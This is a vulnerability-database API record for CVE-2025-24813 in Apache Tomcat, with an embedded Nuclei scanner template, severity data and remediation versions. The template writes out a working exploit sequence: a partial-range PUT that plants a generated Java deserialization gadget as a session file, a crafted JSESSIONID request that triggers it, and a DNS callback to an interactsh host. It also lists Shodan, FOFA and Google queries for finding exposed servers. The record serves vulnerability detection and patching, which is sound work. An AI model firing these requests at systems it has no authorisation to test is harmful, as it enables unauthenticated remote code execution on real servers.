{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-24813/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-24813/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-24813/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-24813/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-24813/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-24813"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-24813"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-24813.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2025-24813\n\ninfo:\n  name: Apache Tomcat Path Equivalence - Remote Code Execution\n  author: iamnoooob,rootxharsh,pdresearch,theMiddle\n  severity: critical\n  description: |\n    Path Equivalence- 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.\n  impact: |\n    Unauthenticated attackers can exploit path equivalence issues to upload malicious files and execute arbitrary code, leading to complete server compromise and potential data exfiltration.\n  remediation: |\n    Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue.\n  reference:\n    - https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html\n    - https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq\n    - http://www.openwall.com/lists/oss-security/2025/03/10/5\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-24813\n    - https://security.netapp.com/advisory/ntap-20250321-0001/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-24813\n    cwe-id: CWE-44,CWE-502\n    epss-score: 0.99927\n    epss-percentile: 0.99968\n    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: apache\n    product: tomcat\n    shodan-query:\n      - http.component:\"apache tomcat\"\n      - cpe:\"cpe:2.3:a:apache:tomcat\"\n      - http.html:\"apache tomcat\"\n      - http.html:\"jk status manager\"\n      - http.title:\"apache tomcat\"\n      - product:\"tomcat\"\n    fofa-query:\n      - server==\"apache tomcat\"\n      - body=\"apache tomcat\"\n      - body=\"jk status manager\"\n      - title=\"apache tomcat\"\n    google-query:\n      - intitle:\"apache tomcat\"\n      - site:*/examples/jsp/snp/snoop.jsp\n  tags: cve,cve2025,apache,tomcat,rce,intrusive,kev,vkev,vuln\n\nflow: http(1) && http(2)\n\nvariables:\n  filename: \"{{randbase(6)}}\"\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    matchers:\n      - type: word\n        part: header\n        words:\n          - \"Apache\"\n        internal: true\n\n  - raw:\n      - |\n        PUT /{{filename}}.session HTTP/1.1\n        Host: {{Hostname}}\n        Content-range: bytes 0-452/457\n\n        {{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n\n      - |\n        GET /{{filename}} HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: JSESSIONID=.{{filename}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: status\n        status:\n          - 201\n# digest: 490a00463044022022a17b8bf18f9e632f536fafe242a28767fe70eb2e39f278b16ea45da1599e530220199128da504c0f3ea8ff892af3baee7416d34bd38cd2ac06ee7a8dbda52e786b:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-24813"
}